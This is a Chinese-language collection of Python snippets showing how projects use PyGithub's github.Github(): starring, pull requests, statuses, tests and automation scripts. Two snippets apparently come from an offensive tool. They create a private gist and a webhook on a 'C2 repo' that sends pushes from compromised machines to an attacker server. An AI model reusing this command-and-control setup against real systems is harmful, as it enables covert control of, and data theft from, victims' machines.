我们从Python开源项目中,提取了以下50个代码示例,用于说明如何使用github.Github()。
def main(): parser = ArgumentParser(description="Show a user's Github stars") parser.add_argument('-u', '--username', help='Github Username', type=str, default=GITHUB_USERNAME) args = parser.parse_args() username = args.username gh = Github(GITHUB_USERNAME, GITHUB_PASS) usr = gh.get_user(username) for repo in usr.get_starred(): print(u"{} ({}) @ {}".format( repo.full_name, repo.description, repo.html_url))
def search(self, query): data = [] json_input = open(self.get_path("json_input.json"), "w") gh = Github(self.token) search = gh.search_repositories(query, sort='stars') for repo in search: field = {} field["repo_id"] = repo.id languages = repo.get_languages().keys() stargazers = repo.get_stargazers_with_dates() for lang in languages: field["language_id"] = lang for stargazer in stargazers: field["stargazer_id"] = stargazer.user.id field["time_value"] = stargazer.starred_at.strftime("%Y-%m-%dT%H:%S") data.append(field) input_data = json.dumps(data, indent=4, sort_keys=True) json_input.write(input_data)
def create_private_gist(config, main_github_token, filename, content, description): g = Github(main_github_token) g_user = g.get_user() gist = g_user.create_gist(False, {filename: github.InputFileContent(content)}, description) # gists have a list of files associated with them, we just want the first one # gist.files = {'filename': GistFile(filename), ...} gist_file = [x for x in gist.files.values()][0] config["gist_raw_contents_url"] = gist_file.raw_url # The structure of the url is: # https://gist.githubusercontent.com/<username>/<gist guid>/raw/<file guid>/<filename.txt> # # Since we're only uploading one file and we want to make the URL as concise as possible, # it turns out we can actually trim off everything after /raw/ and it'll still give us what # we want. config["gist_raw_contents_url"] = config["gist_raw_contents_url"].split("/raw/")[0] + "/raw" print("[*] Private gist content at:") print("- %s" % config["gist_raw_contents_url"]) return config # Return the content that will placed in the private gist
def create_c2_webhook(config): print("[*] Creating GitHub webhook for C2 repo that will receive pushes from compromised machines ") g = Github(config["main_github_token"]) g_user = g.get_user() repo = g_user.get_repo(config["github_c2_repo_name"]) # this endpoint is defined in server/gitpwnd/controllers.py webhook_endpoint = config["attacker_server"] + "/api/repo/receive_branch" # We're using a self-signed cert, so we need to turn off TLS verification for now :( # See the following for details: https://developer.github.com/v3/repos/hooks/#create-a-hook hook_secret = str(uuid.uuid4()) params = {"url": webhook_endpoint, "content_type": "json", "secret": hook_secret, "insecure_ssl": "1"} # PyGithub's create_hook doc: # http://pygithub.readthedocs.io/en/latest/github_objects/Repository.html?highlight=create_hook try: repo.create_hook("web", params, ["push"], True) except: print("[!] Web hook already exists") hook = repo.get_hooks()[0] if "secret" not in hook.config.keys(): print("[!] Adding a secret to the hook...") else: hook_secret = input("Enter webhook secret (Github Repo > Settings > Webhooks > Edit > Inspect 'Secret' element): ") new_hook_config = hook.config new_hook_config["secret"] = hook_secret hook.edit(name=hook.name, config=new_hook_config) finally: return hook_secret # Automatically generate a new password for the gitpwnd server # so we don't use a default one
def __init__(self): if is_appengine_local(): secrets = DEBUG_CLIENT_SECRETS else: secrets = CLIENT_SECRETS with open(secrets, 'r') as contents: secrets = json.loads(contents.read()) github_token = secrets.get(TOKEN_KEY) self.webhook_secret = secrets.get(WEBHOOK_SECRET) if is_appengine_local(): self.reporter_host = DEBUG_CRASH_REPORTER_HOST self.repo_name = '{0}/{1}'.format(DEBUG_OWNER, DEBUG_REPO) else: self.reporter_host = CRASH_REPORTER_HOST self.repo_name = '{0}/{1}'.format(OWNER, REPO) self.github_client = Github(login_or_token=github_token)
def __init__(self, config, agentid, issue): self.config = config self.agentid = agentid self.issue = issue #logging.debug(yaml.dump(config)) self.ghuser_name = config.github()['git_user_name'] self.ghtoken = config.github()['git_app_token'] self.ghrepo_name = config.github()['git_repo_name'] self.gh_rlimit = config.github()['git_rlimit'] self.ghcomm_limit = config.github()['git_comm_limit'] self.gh = Github(self.ghuser_name, self.ghtoken) self.ghuser = self.gh.get_user() self.ghrepo = self.ghuser.get_repo(self.ghrepo_name) self.ghissue = self.ghrepo.get_issue(self.issue)
def update_organisation_repos(organisation, token, filename, excludes, include_forks): """Searches a Github organisation for repositories that can be cloned, writes discovered repo URLs to a local file.""" github_client = Github(token) org = github_client.get_organization(organisation) printerr("Looking up {org} repositories (may take some time)".format(org=organisation)) repos = org.get_repos("public") if not include_forks: repos = (repo for repo in repos if not repo.fork) clone_urls = _clone_urls(repos) filtered = filter_excluded_repos(clone_urls, excludes) with open(filename, "w") as f: _write_repo_list(filtered, f) printerr("Wrote list of repositories to {location}".format(location=filename)) return
def get_repository(): """Get the GitHub repo specified in settings or the default. If the repo doesn't exist, try to create it. """ try: g = Github(**get_github_credentials()) if app_settings.GITHUB_ORG: user = g.get_organization(app_settings.GITHUB_ORG) else: user = g.get_user() try: return user.get_repo(app_settings.GITHUB_REPO) except UnknownObjectException: logging.info("Creating repository {}".format( app_settings.GITHUB_REPO )) return user.create_repo(app_settings.GITHUB_REPO) except GithubException: logging.exception("Unable to configure Github connection.")
def __init__(self, config, assets): # Params self.config = config self.assets = assets self.newassets = [] # Github API self.github = None self.githubuser = None self.githubrepo = None self.release = None # Initialize parent Step.__init__(self, 'Upload the release', Substep('Configure HTTPS download server', self.substep1), Substep('Upload to Github', self.substep2))
def substep2(self): """Upload to Github""" # Create release if not existant if self.release is None: self.release = self.githubrepo.create_git_release( self.config['tag'], self.config['project'] + ' ' + self.config['tag'], self.config['message'], draft=False, prerelease=self.config['prerelease']) # Upload assets for asset in self.newassets: assetpath = os.path.join(self.config['output'], asset) self.verbose('Uploading {}'.format(assetpath)) # TODO not functional # see https://github.com/PyGithub/PyGithub/pull/525#issuecomment-301132357 self.release.upload_asset(assetpath)
def create_or_update_comment(self, message): """ Notify a list of GitHub user names that they should review this pull request. Only notifies the users once. :param reviewers: A list of GitHub user names that should review the PR :param required: A list of GitHub user names that are required to review the PR :param prefix: A prefix to append to any automated comments """ # see: https://github.com/blog/2178-multiple-assignees-on-issues-and-pull-requests # see: https://github.com/PyGithub/PyGithub/issues/404 if not message: return existing_comment = self._get_existing_comment() if existing_comment: if existing_comment.body == message: return existing_comment.edit(message) else: self._pr.create_issue_comment(message)
def __init__(self, index='codetoname', page_num=0, page_size=30, language='python', account=None, password=None): self._es = elasticsearch.Elasticsearch() self._es_index = index self._page_num = page_num self._page_size = page_size self._language = language self._total_page_num = 0 if account and password: github_client = github.Github(account, password, per_page=page_size) print('Hi, {}'.format(github_client.get_user().name)) else: github_client = github.Github(per_page=page_size) self._github_client = github_client self._github_response = None self._latest_repo_updated = None self._latest_repo_index = False self._update_searching_response()
def test__when_comment_data_is_valid__should_send_it_to_proper_github_endpoint(self): proper_data = {'repository': 'repo', 'sha': '123abc', 'body': 'Comment body', 'jobName': 'job'} request = mock({'headers': {'Authorization': f'Token {self.API_TOKEN}'}}, spec=aiohttp.web_request.Request) github_client = mock(spec=github.Github) github_repository = mock(spec=github.Repository) github_commit = mock(spec=github.Commit) pipeline_controller = PipelineController(github_client, mock(), self.API_TOKEN) # given when(request).json().thenReturn(async_value(proper_data)) when(CommentRequestData).is_valid_comment_data(proper_data).thenReturn(True) when(github_client).get_repo('repo').thenReturn(github_repository) when(github_repository).get_commit('123abc').thenReturn(github_commit) when(github_commit).create_comment(body='job\nComments: Comment body') # when response: aiohttp.web.Response = await pipeline_controller.handle_comment(request) # then assert response.status == 200 assert response.text == 'Comment ACK'
def test__when_status_data_is_ok__should_call_github_client_to_create_status(self): proper_data = {'repository': 'repo', 'sha': '123abc', 'state': 'State', 'description': 'Description', 'context': 'Context', 'url': 'pr_url'} request = mock({'headers': {'Authorization': f'Token {self.API_TOKEN}'}}, spec=aiohttp.web_request.Request, strict=True) github_client = mock(spec=github.Github, strict=True) github_repository = mock(spec=github.Repository, strict=True) github_commit = mock(spec=github.Commit, strict=True) pipeline_controller = PipelineController(github_client, mock(), self.API_TOKEN) # given when(request).json().thenReturn(async_value(proper_data)) when(StatusRequestData).is_valid_status_data(proper_data).thenReturn(True) when(github_client).get_repo('repo').thenReturn(github_repository) when(github_repository).get_commit('123abc').thenReturn(github_commit) when(github_commit).create_status(state='State', description='Description', target_url='pr_url', context='Context') # when response: aiohttp.web.Response = await pipeline_controller.handle_status(request) # then assert response.status == 200 assert response.text == 'Status ACK'
def test__when_github_entity_is_not_found__comment_should_return_404_response_with_github_explanation(self): parameters = {'repository': 'repo', 'sha': 'null', 'body': 'Comment body', 'jobName': 'job'} request = mock({'headers': {'Authorization': f'Token {self.API_TOKEN}'}}, spec=aiohttp.web_request.Request, strict=True) github_client = mock(spec=github.Github, strict=True) github_repository = mock(spec=github.Repository, strict=True) pipeline_controller = PipelineController(github_client, mock(), self.API_TOKEN) # given when(request).json().thenReturn(async_value(parameters)) when(CommentRequestData).is_valid_comment_data(parameters).thenReturn(True) when(github_client).get_repo('repo').thenReturn(github_repository) github_exception_data = {'message': 'Not Found', 'documentation_url': 'https://developer.github.com/v3/'} when(github_repository).get_commit('null').thenRaise(github.GithubException(404, github_exception_data)) # when response: aiohttp.web.Response = await pipeline_controller.handle_comment(request) # then assert response.status == 404 assert response.reason == str(github_exception_data)
def test__when_setting_pr_sync_label__if_github_raises_more_then_3_times__timeout_error_should_be_raised(self): github_client: github.Github = mock(spec=github.Github, strict=True) github_controller = GithubController(github_client, mock(), mock(), mock()) github_repository: github.Repository.Repository = mock(spec=github.Repository.Repository, strict=True) mock(spec=asyncio) # when when(github_client).get_repo('repo')\ .thenRaise(github.GithubException(404, 'repo not found'))\ .thenRaise(github.GithubException(404, 'repo not found'))\ .thenReturn(github_repository) when(github_repository).get_issue(43)\ .thenRaise(github.GithubException(404, 'repo not found')) when(asyncio).sleep(1)\ .thenReturn(async_value(None))\ .thenReturn(async_value(None))\ .thenReturn(async_value(None)) # then with pytest.raises(TriggearTimeoutError) as timeout_error: await github_controller.set_pr_sync_label_with_retry('repo', 43) assert str(timeout_error.value) == 'Failed to set label on PR #43 in repo repo after 3 retries'
def test__when_setting_pr_sync_label__if_github_returns_proper_objects__pr_sync_label_should_be_set(self): github_client: github.Github = mock(spec=github.Github, strict=True) github_controller = GithubController(github_client, mock(), mock(), mock()) github_repository: github.Repository.Repository = mock(spec=github.Repository.Repository, strict=True) github_issue: github.Issue.Issue = mock(spec=github.Issue.Issue, strict=True) # given when(github_client).get_repo('repo')\ .thenReturn(github_repository) when(github_repository).get_issue(43)\ .thenReturn(github_issue) expect(github_issue, times=1)\ .add_to_labels('triggear-pr-sync') # when result = await github_controller.set_pr_sync_label_with_retry('repo', 43) # then assert result is None
def test__when_get_repo_labels_is_called__only_label_names_are_returned(self): github_client: github.Github = mock(spec=github.Github, strict=True) github_controller = GithubController(github_client, mock(), mock(), mock()) github_repository: github.Repository.Repository = mock(spec=github.Repository.Repository, strict=True) label: github.Label.Label = mock({'name': 'label'}, spec=github.Label.Label, strict=True) other_label: github.Label.Label = mock({'name': 'other_label'}, spec=github.Label.Label, strict=True) # given when(github_client).get_repo('repo')\ .thenReturn(github_repository) when(github_repository).get_labels()\ .thenReturn([label, other_label]) # when result: List[str] = github_controller.get_repo_labels('repo') # then assert result == ['label', 'other_label']
def test__get_pr_labels__should_return_only_label_names(self): github_client: github.Github = mock(spec=github.Github, strict=True) github_controller = GithubController(github_client, mock(), mock(), mock()) github_repository: github.Repository.Repository = mock(spec=github.Repository.Repository, strict=True) label: github.Label.Label = mock({'name': 'label'}, spec=github.Label.Label, strict=True) other_label: github.Label.Label = mock({'name': 'other_label'}, spec=github.Label.Label, strict=True) github_issue: github.Issue.Issue = mock({'labels': [label, other_label]}, spec=github.Issue.Issue, strict=True) when(github_client).get_repo('repo')\ .thenReturn(github_repository) when(github_repository).get_issue(25)\ .thenReturn(github_issue) labels: List[str] = github_controller.get_pr_labels('repo', 25) assert ['label', 'other_label'] == labels
def main(): parser = ArgumentParser(description=__doc__) parser.add_argument("version") parser.add_argument("--token", "-t", type=str, help="GitHub API token to use") args = parser.parse_args() if args.token: hub = Github(args.token) else: hub = Github() repo = hub.get_user('UNINETT').get_repo('nav') milestones = [m for m in repo.get_milestones(state='all') if m.title == args.version] if milestones: mstone = milestones[0] else: print("Couldn't find milestone for {}".format(args.version), file=sys.stderr) sys.exit(1) issues = repo.get_issues(state='closed', milestone=mstone) for issue in sorted(issues, key=operator.attrgetter('number')): print(format_issue(issue).encode('utf-8'))
def get_orgs(intent, session): session_attributes = {} reprompt_text = None should_end_session = True g = Github(session['user']['accessToken']) orgs = g.get_user().get_orgs() num_orgs = 0 org_strings = [] for org in orgs: num_orgs += 1 org_strings.append(org.url[org.url.rfind('/')+1:]) if num_orgs > 0: speech_output = \ 'You belong to these organizations. ' + ','.join(org_strings) else: speech_output = "You don't have any organizations in this account." return build_response(session_attributes, build_speechlet_response( intent['name'], speech_output, reprompt_text, should_end_session))
def merge_pr(intent, session, dialog_state): filled_slots = delegate_slot_collection(intent, dialog_state) if intent != filled_slots: return filled_slots session_attributes = {} reprompt_text = None should_end_session = True repo_name = filled_slots['REPONAME']['value'] pr_number = filled_slots['PRNUMBER']['value'] g = Github(session['user']['accessToken']) repo = g.get_repo(repo_name) pr = repo.get_pull(pr_number) if pr.mergable(): pr.merge() speech_output = 'pull request ' + pr_number + ' merged.' else: speech_output = 'pull request ' + pr_number + ' cannot be merged.' return build_response(session_attributes, build_speechlet_response( intent['name'], speech_output, reprompt_text, should_end_session))
def __init__(self): config = configparser.ConfigParser() config.read("github.conf") fileUsername = config.get("DEFAULT", "username") filePassword = config.get("DEFAULT", "password") fileToken = config.get("DEFAULT", "token") if not fileUsername and not fileToken: logger.error("Username and Token is not filled in github.conf file. Please input login data.") raise LookupError("github.conf is not properly filled.") if fileToken: self.api = Github(fileToken) else: self.api = Github(fileUsername, filePassword)
def main(argv=None, test=False): arguments = docopt(__doc__, argv=argv) status = arguments['--status'] commit = arguments['--commit-hash'] user = arguments['--username'] password = arguments['--password'] token = arguments['--token'] url = arguments['--url'] repo = arguments['--repo'] context = arguments['--context'] description = arguments['--description'] print "Setting status %s for commit %s." % (status, commit) if token: g = Github(token) elif user and password: g = Github(user,password) r = g.get_repo(repo) c = r.get_commit(commit) s = c.create_status(status, target_url=url, description=description, context=context) if test: return s
def main(argv=None, test=False): arguments = docopt(__doc__, argv=argv) head = arguments['--head'] base = arguments['--base'] token = arguments['--token'] repo = arguments['--repo'] title = arguments['--title'] description = arguments['--description'] print "Pulling %s into %s in repo %s." % (head, base, repo) if not title: title = "Auto-generated pull request." if not description: description = "Auto-generated pull request." g = Github(token) r = g.get_repo(repo) p = r.create_pull(head=head, base=base, title=title, body=description) if test: return p
def _batch_worker(queue_input, queue_output): classifiers = classifier.get_all_classifiers() try: while True: data = queue_input.get(True, 1) sum_results = utility.get_zero_class_dict() classifier_results = dict() for c in classifiers: result = c.classify(data) classifier_results[c.name()] = result for key in sum_results.keys(): if key in result: sum_results[key] += result[key] / len(classifiers) queue_output.put((data, utility.get_best_class(sum_results), sum_results, classifier_results)) except queue.Empty: sys.exit(0) ## # \brief Learning worker for parallel processing. # # \param input List containing Tupel (GITHUB, CLASS), where GITHUB is the repository as a github.Github class and # CLASS is the class label of the repository as a string. # \param queue_classifier multiprocessing.Queue containing classifier objects for learning.
def result_to_file(result, filename): try: with open(filename, 'w') as file: for r in result: file.write('{} {}\n'.format(r[0].get_repo_url(), r[1])) except: logging.error('Can not save results to {}'.format(filename)) ## # \brief Parsed the files in a directory and returns input for learning. # # The directory has to contain one file with the name of each class ('DEV', 'HW', 'EDU', 'DOCS', 'WEB', 'DATA', 'OTHER') # containing lines with repositories of that class. # # \param path Path to directory. # \return List containing Tupel (GITHUB, CLASS), where GITHUB is the repository as a github.Github class and # CLASS is the class label of the repository as a string.
def _get_input(self, github_object): try: metadata = github_object.get_repository_data() input = [ metadata['fork'], True if metadata['homepage'] is not None else False, metadata['size'], metadata['stargazers_count'], metadata['watchers_count'], metadata['has_wiki'], metadata['has_pages'], metadata['forks_count'], metadata['open_issues_count'], metadata['subscribers_count'] ] return input except github.GithubError: return [0.0 for _ in range(10)] ## # \brief Classifies the repository based on the learned <em>Decision Tree</em>. # # \param data GitHub repository as github.Github object. # \return Dictionary {CLASS: PROBABILITY}, where CLASS is a string containing the class label and # PROBABILITY is a float in [0.0, 1.0] containing the probability that the repository belongs to the class.
def classify(self, data): if 'version' not in self._model.config: logging.error('Trying to use MetadataClassifier without learning first') return utility.get_zero_class_dict() if self._model.config['version'] != sklearn.__version__: logging.error('Using MetadataClassifier with different scikit learn version (trained on: {}, used: {}) - relearn classifier first'.format(self._model.config['version'], sklearn.__version__)) return utility.get_zero_class_dict() if self._tree is None: self._tree = pickle.loads(base64.b64decode(self._model.config['tree'])) probability = self._tree.predict_proba([self._get_input(data)]) result = utility.get_zero_class_dict() for i in range(len(self._tree.classes_)): result[self._tree.classes_[i]] = probability[0][i] return result ## # \brief Trains a <em>Decision Tree</em> based on the provided repositories. # # \param learn List containing Tupel (GITHUB, CLASS), where GITHUB is the repository as a github.Github class and # CLASS is the class label of the repository as a string.
def classify(self, data): try: language = data.get_repository_data()['language'] except github.GithubError: return utility.get_zero_class_dict() if language is None: language = '_None_' if language in self._model.config: return self._model.config[language].copy() else: return utility.get_zero_class_dict() ## # \brief Learns the distribution of the languages based on the provided repositories. # # \param learn List containing Tupel (GITHUB, CLASS), where GITHUB is the repository as a github.Github class and # CLASS is the class label of the repository as a string.
def _get_entry(self, languages, known_languages): entry = [] for language in known_languages: if language in languages: entry += [languages[language]] else: entry += [0] sum_entry = sum(entry) if sum_entry != 0: entry = [x / sum_entry for x in entry] return entry ## # \brief Classifies the reoisitory based on the learned <em>Decision Tree</em>. # # \param data GitHub repository as github.Github object. # \return Dictionary {CLASS: PROBABILITY}, where CLASS is a string containing the class label and # PROBABILITY is a float in [0.0, 1.0] containing the probability that the repository belongs to the class.
def setUp(self): # setup config configserver._CONGIF['maximum_cache_age'] = 366000 # About 1000 years configserver._CONGIF['cache_path'] = './tests/cache' configserver._CONGIF['model_path'] = './tests/models' self.classifier = classifier.get_all_classifiers() self.github_list = [github.Github('Top-Ranger', 'kana-keyboard'), github.Github('Top-Ranger', 'CHI2016-SUR-datasets'), github.Github('Top-Ranger', 'SPtP_learningdb'), github.Github('Top-Ranger', 'SUR213'), github.Github('Top-Ranger', 'bakery'), github.Github('Top-Ranger', 'fooling_dnn'), github.Github('Top-Ranger', 'harbour-hiragana'), github.Github('Top-Ranger', 'harbour-katakana'), github.Github('Top-Ranger', 'harbour-reversi'), github.Github('Top-Ranger', 'qnn'), github.Github('Top-Ranger', 'SPtP')]
def __init__(self, *, api_url=_DEFAULT_BASE_URL, clone_protocol="ssh", **kwargs): super().__init__(**kwargs) self._clone_protocol = self.CloneProtocol(clone_protocol) self._gh = github.Github( login_or_token=os.environ.get("GITHUB_TOKEN"), base_url=api_url )
def create_pr_to_master(target_branch): """create a github pr from target_branch to master""" git = Github(os.environ.get('GITHUB_ACCESS_TOKEN')) repo = git.get_user().get_repo('mattermost-openshift') print(repo.pulls_url) repo.create_pull('automated update', 'This PR is generated as part of an automated update triggered by a new Mattermost release.', 'master', target_branch)
def get_repo(token, name, org): gh = Github(token) if org: return gh.get_organization(org).get_repo(name=name) return gh.get_user().get_repo(name=name)
def handle(self): client = Github(self.username, self.password) today_commit_events = get_today_commit_events(client.get_user(self.username)) if len(today_commit_events) == 0: return False else: return True
def get_github(): with open(os.path.join(os.path.dirname(__file__), "..", "ghtoken.txt")) as f: ghtoken = f.read().strip() return github.Github(ghtoken)
def get_repository(name, username=None, password=None, auth_required=False): username = username or os.getenv('GITHUB_USERNAME') password = password or os.getenv('GITHUB_PASSWORD') if auth_required and not (username and password): raise Exit('Mandatory GitHub username/password not given.') return Github(username, password).get_repo(name)
def main(): parser = ArgumentParser(description="Retrieve Github activity") parser.add_argument('month', type=int, help='Month for activity log') args = parser.parse_args() g = Github(GITHUB_USERNAME, GITHUB_PASS) usr = g.get_user(GITHUB_USERNAME) year = datetime.now().year this = (year, int(args.month)) tpl = "{0} - {1}: {2}" for event in usr.get_public_events(): # go back in history until the start date is reached if event.type != u"PushEvent": continue if month(event.created_at.date()) > this: continue # if month(event.created_at.date()) < this: # break repo_url = event._repo.value.html_url if not is_work_repo(repo_url): continue repo = repo_url.split('/')[-1] commits = event.payload['commits'] for commit in commits: if GITHUB_AUTHOR not in commit['author']['name'].lower(): continue print(tpl.format(event.created_at.date(), repo, commit['message']))
def process(input): gh_username = setup.get_gh_username() gh_password = setup.decrypt_password() gh = github.Github(gh_username, gh_password) click.echo(chalk.blue('you are in git module')) click.echo('input = %s' % input) USER_CONFIG_FILE_PATH = get_config_file_paths()['USER_CONFIG_FILE_PATH'] USER_CONFIG_FOLDER_PATH = get_folder_path_from_file_path(USER_CONFIG_FILE_PATH) repo = porcelain.init(USER_CONFIG_FOLDER_PATH) porcelain.add(repo) porcelain.commit(repo, "A sample commit") porcelain.remote_add(repo, ".yoda", "https://github.com/manparvesh/.yoda") porcelain.push(repo, "https://github.com/manparvesh/.yoda")
def get_repos(key, org, repo, url): if url: g = Github(key, base_url=url) else: g = Github(key) if org: g_org = g.get_organization(login=org) else: g_org = g.get_user() if repo: repos = [g_org.get_repo(repo)] else: repos = g_org.get_repos() return repos
def _get_current_repo(github, repo, remote='origin'): """ Gets the github repo associated with the provided repo :param Github github: :param Repo repo: :param unicode remote: :return: The github repository assocated with the provided repo :rtype: github.Repository.Repository """ owner, repo = _get_org_and_name_from_remote(repo.remotes[remote]) return github.get_repo('{0}/{1}'.format(owner, repo))
def _instantiate_github(username): """ Gets a github object that has been authenticated. If authentication fails it asks the user for their password agains :param unicode username: :rtype: Github """ password = get_github_password(username) count = 0 while True: count += 1 github = Github(login_or_token=username, password=password) try: auth = github.get_user().create_authorization( scopes=['repo'], note='github-reviewboard-sync {0}'.format(str(uuid4()))) return github, auth except BadCredentialsException as exc: _LOG.error('The password was not valid for "{0}"'.format(username)) if count == 3: raise AuthenticationException('Failed to authenticate three times. ' 'Is "{0}" the correct username?'.format(username)) password = get_github_password(username, refresh=True) except TwoFactorException as exc: user = github.get_user() onetime_password =input('Github 2-Factor code: ') authorization = user.create_authorization( scopes=['repo'], note='github-reviewboard-sync {0}'.format(str(uuid4())), onetime_password=onetime_password) return Github(authorization.token), authorization
def main(): user = os.environ.get('GH_USER') or USER logging.info("tracking stars for user {}".format(user)) logging.info("If this is not your username, change it in the python file") user = Github(os.environ.get('GH_TOKEN') or TOKEN or get_token()).get_user(USER) for repo in user.get_starred(): repo_ = { 'name': repo.full_name, 'description': repo.description, 'releases': list(), } logging.info("getting {}".format(repo.full_name)) for release in repo.get_releases(): release_date = parse_date(release.raw_data['published_at']) if NOW - release_date < dt.timedelta(days=DAYS): repo_['releases'].append(release.raw_data) else: break # TODO XXX we assume, that those releases are ordered for tag in repo.get_tags(): sha = tag.raw_data['commit']['sha'] commit = repo.get_commit(sha) tag_date = parse_date(commit.raw_data['commit']['author']['date']) if (NOW - tag_date < dt.timedelta(days=DAYS)): if tag.name not in [r['name'] for r in repo_['releases']]: tag.raw_data['tag_name'] = '' tag.raw_data['published_at'] = commit.raw_data['commit']['author']['date'] repo_['releases'].append(tag.raw_data) else: break if repo_['releases']: print(format_repo(repo_))
def parse_args(args): parser = argparse.ArgumentParser( description=DESCRIPTION, formatter_class=argparse.RawDescriptionHelpFormatter, ) parser.add_argument( 'repo', help='Github repo to export, in format "owner/repo_name".', type=str, action='store', # TODO - validate this is in correct format. ) parser.add_argument( 'outpath', help='Path to write exported issues.', type=str, action='store', ) parser.add_argument( '-l', '--login', help='Prompt to login as this Github user. If provided, this takes ' 'precedence over any token found in the environment. If not ' 'provided and no token is found, you will be prompted to login as ' 'the repository owner.', type=str, action='store', dest='login_user', ) parser.add_argument( '-t', '--token', help='Automatically login with this Github API token. If --login is ' 'provided, this is ignored.', type=str, action='store', dest='token', ) return parser.parse_args(args)
def export_issues_to_markdown_file(repo, outpath): formatted_issues = [] for issue in repo.get_issues(state='all'): # The Github API includes pull requests as "issues". Skip # closed PRs, as they will add a lot of noise to the export. try: if issue.pull_request and issue.state.lower() == 'closed': continue except: traceback.print_exc() print("Caught exception checking whether issue is PR, skipping") continue # Try multiple times to process the issue and append to main issue list try: formatted_issue = process_issue_to_markdown(issue) except: traceback.print_exc() print("Couldn't process issue due to exceptions, skipping") continue else: formatted_issues.append(formatted_issue) full_markdown_export = templates_markdown.BASE.format( repo_name=repo.full_name, repo_url=repo.html_url, issues="\n".join(formatted_issues), date=datetime.datetime.now().strftime('%Y.%m.%d at %H:%M:%S') ) print("Exported {} issues".format(len(formatted_issues))) print("Writing to file: {}".format(outpath)) with open(outpath, 'wb') as out: out.write(full_markdown_export.encode('utf-8')) return None
def github_login(login_user=None, token=None, fallback_user=None): assert login_user or token or fallback_user per_page = 100 if login_user: password = getpass.getpass("Github password for {} :".format(login_user)) return Github(login_or_token=login_user, password=password, per_page=per_page) if token: return Github(login_or_token=token, per_page=per_page) password = getpass.getpass("Github password for {} :".format(fallback_user)) return Github(login_or_token=fallback_user, password=password, per_page=per_page)
def print_rate_limit(gh): limit = gh.get_rate_limit() print("Github API rate limit: {}".format(limit.rate.raw_data))
def github_from_request(request): provider = request.user.social_auth.get(provider='github-org') return github.Github(provider.extra_data['access_token'])
def main(): github = Github(GITHUB_TOKEN) org = github.get_organization(GITHUB_ORG) for member in org.get_members(): create_user_role(member.login) for team in org.get_teams(): create_team_bucket(team.slug) for member in team.get_members(): attach_bucket_policy(team.slug, member.login)